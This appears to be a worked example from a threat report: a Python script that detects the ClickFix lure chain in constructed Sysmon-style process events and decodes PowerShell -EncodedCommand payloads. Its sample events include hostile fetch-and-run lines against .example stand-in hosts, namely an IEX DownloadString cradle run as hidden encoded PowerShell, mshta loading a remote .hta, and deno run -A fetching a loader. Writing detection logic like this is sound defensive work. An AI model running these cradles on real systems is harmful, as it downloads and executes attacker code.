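<p><strong> Worked example: triaging the ClickFix execution chain. </strong> The following script is an added example and is not code from this report or from Anomali; it turns the &ldquo;How ClickFix works&rdquo; description, the &ldquo;ClickFix Execution Chain&rdquo; detection logic in the SOC guidance, and 30-day action 11 into runnable detection logic over constructed Sysmon-style process-creation events. It flags encoded or hidden-window shells spawned from explorer.exe (the Run dialog) or WindowsTerminal.exe, script hosts launched with a URL, unexpected deno.exe execution, and interactive downloaders, and it decodes PowerShell -EncodedCommand payloads (Base64 over UTF-16LE) so an analyst sees what the user actually pasted. The field names (image, parent_image, command_line), the hostnames, the .example domains, and the Deno allowlist are assumptions to be mapped onto your EDR&rsquo;s schema.</p>

```python
"""
ClickFix execution-chain triage over process-creation telemetry.

Added worked example; this is not code from the Anomali report. It runs the
four ClickFix detection ideas from the SOC guidance over a handful of
constructed Sysmon-style process-creation events and decodes PowerShell
-EncodedCommand payloads so the analyst sees what the user actually pasted.
Field names (image, parent_image, command_line), hostnames, and the
*.example domains are assumptions; map them onto your EDR's schema.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents that indicate a human at a console rather than automation.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe",
                       "powershell.exe", "pwsh.exe", "conhost.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Assumed baseline: hosts where a Deno runtime is expected (developer builds).
DENO_ALLOWLIST_HOSTS = {"DEV-WS-01"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload
# is Base64 over UTF-16LE.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+h(?:idden)?\b")
DOWNLOAD_HINT = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|https?://")


@dataclass
class Event:
    host: str
    image: str          # basename of the created process
    parent_image: str   # basename of its parent
    command_line: str


@dataclass
class Finding:
    rule: str
    technique: str
    host: str
    detail: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: Event) -> List[Finding]:
    findings: List[Finding] = []
    image, parent, cmd = event.image.lower(), event.parent_image.lower(), event.command_line

    # 1. Shell launched from the Run dialog (explorer.exe) or Windows Terminal with an
    #    encoded or hidden-window command. WindowsTerminal.exe is the default console
    #    host on Windows 11, so the argument pattern, not the parent, carries the signal.
    if image in SHELLS and parent in {"explorer.exe", "windowsterminal.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None or HIDDEN_FLAG.search(cmd):
            findings.append(Finding("clickfix_encoded_shell", "T1059.001 / T1204.004", event.host,
                                    f"decoded: {decoded}" if decoded else "hidden-window shell"))

    # 2. Script host launched from explorer.exe or a console shell with a URL argument.
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS and re.search(r"(?i)https?://", cmd):
        findings.append(Finding("clickfix_script_host_url", "T1218.005", event.host, cmd))

    # 3. Deno runtime on a host where it is not part of the standard build.
    if image == "deno.exe" and event.host not in DENO_ALLOWLIST_HOSTS:
        findings.append(Finding("deno_unexpected_runtime", "T1059.007 / T1620", event.host, cmd))

    # 4. Download utility driven by a person, not by a scheduler or service parent.
    #    Encoded shells are already reported by rule 1, so they are skipped here.
    if parent in INTERACTIVE_PARENTS and (image == "curl.exe" or image in SHELLS) \
            and DOWNLOAD_HINT.search(cmd) and not ENCODED_FLAG.search(cmd):
        findings.append(Finding("interactive_ingress_tool", "T1105", event.host, cmd))
    return findings


def triage_all(events: List[Event]) -> List[Finding]:
    return [f for e in events for f in triage(e)]


def _ps_encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs). The first event is what a
# "fix the CAPTCHA" lure leaves behind after Win+R, Ctrl+V, Enter.
LURE_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://verify-captcha.example/s.ps1')"
SAMPLE_EVENTS = [
    Event("STATE-WS-042", "powershell.exe", "explorer.exe",
          f"powershell.exe -w hidden -nop -enc {_ps_encode(LURE_STAGE1)}"),
    Event("STATE-WS-017", "mshta.exe", "cmd.exe",
          'mshta.exe "http://docs-viewer.example/update.hta"'),        # pasted into a cmd tab
    Event("FIN-WS-009", "deno.exe", "powershell.exe",
          "deno.exe run -A http://cdn-assets.example/l.ts"),           # LeakNet-style in-memory loader
    Event("DEV-WS-01", "deno.exe", "code.exe", "deno.exe task dev"),   # allowlisted developer host
    Event("STATE-WS-042", "powershell.exe", "windowsterminal.exe", "powershell.exe -NoLogo"),
    Event("SRV-PATCH-01", "curl.exe", "svchost.exe",
          "curl.exe -o patch.msi https://updates.example/patch.msi"),  # scheduler-driven, not interactive
    Event("STATE-WS-101", "powershell.exe", "windowsterminal.exe",
          'powershell.exe -c "Invoke-WebRequest https://intranet.example/tool.zip -OutFile tool.zip"'),
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.technique} host={f.host} :: {f.detail}")
```

<p>Run against the sample events, the script reports the encoded shell on STATE-WS-042 with its decoded download cradle, the mshta URL launch, the Deno loader on the finance workstation, and the interactive Invoke-WebRequest; the allowlisted developer host, the plain interactive PowerShell session, and the scheduler-driven curl produce nothing. The decoding step matters more than it looks: a lure pasted through the Run dialog usually arrives encoded, so a rule that only matches plaintext URLs misses it, and handing the analyst the decoded cradle shortens triage from &ldquo;suspicious PowerShell&rdquo; to &ldquo;stage-one download from this domain&rdquo;.</p>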
